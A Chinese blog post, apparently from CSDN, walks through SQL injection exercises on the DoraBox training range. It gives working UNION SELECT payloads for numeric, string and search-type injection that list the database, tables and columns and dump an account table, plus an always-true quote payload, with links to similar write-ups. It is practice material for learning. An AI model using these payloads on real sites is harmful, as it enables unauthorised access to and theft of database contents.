DoraBox-sql注入

最新推荐文章于 2022-06-24 20:24:58 发布
最新推荐文章于 2022-06-24 20:24:58 发布
阅读量222 收藏
点赞数
分类专栏: SQL注入学习 文章标签: mysql php html apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43938446/article/details/105456570
版权
  1. SQLi 数字型
    查看有多少列:order by 4之后报错。在这里插入图片描述sql:SELECT * FROM news WHERE id = 1 union select 1,user(),database() limit 1,5 爆出库名-在这里插入图片描述在这里我们确定了数据库为pentest,登录用户为root,接着我们去爆表名。
    sql:SELECT * FROM news WHERE id = 1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='pentest' limit 1,2
    还有另外一种方式,将pentest改为database()
    sql:SELECT * FROM news WHERE id = 1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() limit 1,2
    在这里插入图片描述可以看到有两个表:account,news。接下来去爆account的列名。
    sql:SELECT * FROM news WHERE id = 1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='account' limit 1,2在这里插入图片描述下面根据得到的列名去拿相关的数据就可以了
    sql:SELECT * FROM news WHERE id = 1 union select * from account limit 1,2在这里插入图片描述我们也可以直接一次性爆三列的内容出来。
    sql:SELECT * FROM news WHERE id = 1 union select 1,2,concat_ws('|',id,rest,own) from account limit 1,2在这里插入图片描述
  2. SQLi 字符型
    字符型与数字型的区别在于是否有单引号、双引号、括号等字符包裹,其余方法与数值型注入相同。可以使用万能语句:DoraBox‘ or '1'='1 或者DoraBox' and '1'='1'在这里插入图片描述sql:SELECT * FROM news WHERE title=’-DoraBox’ union select 1,2,'3’在这里插入图片描述其它注入方式比数值型多个单引号就可以,或者在后边加上#、–+、%23等注释符号就可以。
  3. SQLi 搜索型
    sql:SELECT * FROM news WHERE content like '%DoraBox%' union select 1,2,3 limit 1,2 #%'在这里插入图片描述sql:DoraBox%' union select 1,2,concat_ws('|',id,title,content) from news limit 2,2#在这里插入图片描述这几个中如方式的区别只是过滤掉特殊符号而已,而sql注入最主要的也就是过滤特殊符号。
weixin_43938446
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DoraBox实战】————1、SQL注入分析与研究
Fly_鹏程万里
08-06 742
前言 本篇文章将对SQL数字型、字符型、搜索型3种注入漏洞的分析并利用~ SQL数字型注入 简介:当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。 分析:首先,我们可以来看看该sql_num.php文件的设计: 在这里我们从上面往下面分析,首先我们看一下conn.php文件,发现是数据库连接文件 之后查看function.class.php文件,发现是功能函数...
DoraBox sql注入&文件上传
B_roin的博客
03-09 391
SQL注入 1.sqli数字型 :判断是否存在注入点,执行1 and 1=1,有回显,再执行1 and 1=2发现回显不同,判断存在注入点 :判断字段数,执行1 order by 3以及执行1 order by 4时报错,判断字段数为3 :判断具体回显位,执行-1 union select 1,2,3 :获取数据库名和当前用户名,执行-1 union select 1,database(),...
DoraBox-master——SQL注入练习
sevenlob的博客
03-01 719
DoraBox-master环境搭建 今天开始做DoraBox-master的SQL注入练习。DoraBox-master的搭建和通关都要比sqlimaster简单一点。 给一份官方下载地址DraBox在GitHub下载 先改好coon.php文件,一般来说红框框里都改成root 在使用PHP study搭建的环境之下,在 命令行中进行操作。 先把数据库文件打开,每个人安装的位置不一样,但大致...
DoraBox-sql注入数字型
W小哥
12-29 543
第一步:打开目标网站 在框中我们随便输入1 第二步:and 1=1;and 1=2 测试注入点 1=1是永真表达式 而SELECT * FROM news WHERE id = 1 and 1=1只有两个语句SELECT * FROM news WHERE id = 1与1=1全都都为真,页面才会正常显示 1=2是永假表达式 而SELECT * FROM news WHERE id = 1...
DoraBox ——SQL注入(数字型、字符型、搜索型)练习笔记
weixin_46204746的博客
02-29 417
1. 整型 在搜索框中输入一个整数 开始判断数据库的字段数,在框中不断输入:1 order by 1(2,3,4),每次都增大order by后面的数字 直到输入框中输入:1 order by 4时报错,可知字段数为3 开始判断字段中的输出位置:0 union select 1, 2, 3 开始爆数据库:0 union select 1, 2, database() 爆当前数据库中的所有表名...
DoraBoxSQL注入
justoneu的博客
06-24 721
什么是SQL注入?:所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句 字符型与数字型的区别在于,变量是否用单引号包裹,不闭合单引号则无法查询结果。 搜索型SQL注入 一些网站为了方便用户查找网站的资源,提供了...
DoraBox-master.zip
03-17
常见的Web安全问题包括SQL注入、跨站脚本攻击(XSS)、跨站请求伪造(CSRF)等。在DoraBox靶场中,你可以亲自实践这些攻击手段,理解其工作原理,并学习如何预防和修复它们。 靶场的核心在于提供一个可操作的环境,...
10-sql注入-mysql注入1
08-03
SQL注入是一种常见的安全漏洞,通常发生在Web应用程序中,允许攻击者通过输入恶意SQL代码来操纵数据库。MySQL注入是其中一种,特别针对使用MySQL数据库的应用。本文将深入探讨MySQL注入的原理、常见攻击手段以及防范...
php登录页面实现-SQL注入
03-07
然而,如果不正确地处理用户输入,登录页面可能会遭受SQL注入攻击。下面将详细讨论PHP登录页面实现及其与SQL注入的相关知识点。 1. PHP登录页面基础: - `conn.php`:这个文件通常包含数据库连接代码,使用PHP的`...
HDwiki-sql注入1
08-03
标题 "HDwiki-sql注入1" 描述的内容涉及到一个针对HDwiki系统的SQL注入漏洞。这个漏洞出现在PHP代码处理用户输入不当时,导致攻击者能够利用它执行恶意的SQL命令。 首先,我们来看一下问题的关键部分。`array_walk`...
DoraBox-SQL注入篇1–数字型
qq_45780190的博客
09-18 1167
DoraBox - 掌握常见漏洞攻防 SQL注入篇1–数字型 1.判断数据库有几个 输入1查询 输入2查询 输入3查询 发现再也没有数据库查询出来,也就代表着数据库只有两个 2.判断是否存在注入,注入是字符型还是数字型(其实我们已经知道注入是数字类型,但为了更好的学习,按步骤进行学习) 当输入的参数为字符串时,称为字符型。字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。 接着我们分别输入 1 and 1=1 1 and 1=2 输入字符类型时可以知
DoraBox靶场(一)SQL注入
Lorezon的博客
03-17 280
SQLi数字型 输入1 返回正常,并且出现查询使用的整条SQL语句: 常规拼接and 1=1返回正常。 拼接and 1=2页面异常。 判断字段长。 3正常,4异常,字段为3。 判断回显点。 查询数据库名称。 查询表名 查值。 SQLi字符型 字符型和数字型的区别就是有无单引号来闭合,当没有单引号闭合时候,输出没有结果。 单引号进行闭合 判断出回显点接下来就和数字型一样的步骤了,注意闭...
【合天网安】DoraBox靶场之搜索型SQL注入
hehigoxqc606的博客
09-01 297
搜索型: 闭合单引号和百分号,手工注入获取数据 Select * from news where id like ‘%password%’ 简介: 搜索型注入又称之为文本框输入。一些网站为了方便面用户查询网站的资源,提供了搜索的功能,GET型一般用在网站上的搜索,POST型则用在用户的注入;可以从form表单的method属性来区分是GET还是POST。 搜索型(文本框 )注入往往是因为程序员在编写代码时,忽略了对其变量的过滤,导致攻击者输入恶意变量使数据库执行。 实验过程: 1、判断是否存.
sql注入练习--dorabox(整型、字符型、搜索型)
qq_42420978的博客
02-03 432
1、整型 (1)在搜索栏输入:id = 0(SELECT * FROM news WHERE id = 1) (2)判断数据库的字段数 0 order by1(2/3)(SELECT * FROM news WHERE id = 0 order by 3) (3)判断网页上有输出的位置(2/3) 0 union select1,2,3(SELECT * FROM news WHERE id ...
MyBatis的SQL注入攻击和动态SQL
qq_36331657的博客
02-06 1476
SQL注入的危害: 1、数据库被拖库(把数据从数据库拉取出来); 2、重要信息被泄露等; 注入攻击的本质,是把用户输入的数据当做有效代码执行; 举例: 当用户发送GET请求: https://ke.qq.com/course.jsp?id=1 这是一个课程详情页面,会显示出课程的title和content,程序会接收id参数传递给SQL语句,SQL如下: SELECT title, content...
渗透测试学习5:sql手注
weixin_44315099的博客
03-01 190
目录SQL注入初探MySQL联合查询注入(dvwa low靶场)1.判断是否存在注⼊(数字型还是字符型)2.猜解表名3.猜解字段数4.猜解字段名5.获取数据MySQL报错注入MySQL布尔型盲注入MySQL延时型盲注入MySQL⼿注之Root权限处理DNSlog注入HTTP header注入 SQL注入初探 常见数据库:access(小型),mysql(最常见),oracle(大型),postgresql(国外用的多)。 MySQL联合查询注入(dvwa low靶场) union select 联合查询 ,
DVWA漏洞演练平台 - SQL注入
weixin_30667301的博客
08-03 803
SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,具体来说,它是利用现有应用程序将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句. 接下来你需要自行搭建DVWA的漏洞演练环境,我这里使用的系统环境是:Ce...
DoraBox实战】————3、CSRF分析与研究
Fly_鹏程万里
08-07 709
CSRF简介 CSRF的全名为Cross-site request forgery,它的中文名为跨站请求伪造。 CSRF是一种挟持用户在已经登陆的web应用程序上执行非本意的操作的攻击方式。相比于XSS,CSRF是利用了系统对页面浏览器的信任,XSS则利用了系统对用户的信任。 你也可以这样来理解:攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了...
DoraBox实战】————4、文件包含分析与研究
Fly_鹏程万里
08-07 681
文件包含简介 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无须再次编写,这种调用文件的过程一般被称为包含。 程序开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。文件包含漏洞在PHP Web Application中居多,而在JSP,ASP...
wireshark-sql注入探测
最新发布
06-10
Wireshark是一个流量分析工具,可以用于SQL注入探测。下面是一些探测SQL注入攻击的步骤: 1. 启动Wireshark,并开始捕获网络流量。 2. 使用过滤器来过滤HTTP/HTTPS流量,以便找到可能存在SQL注入攻击的流量。 3. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值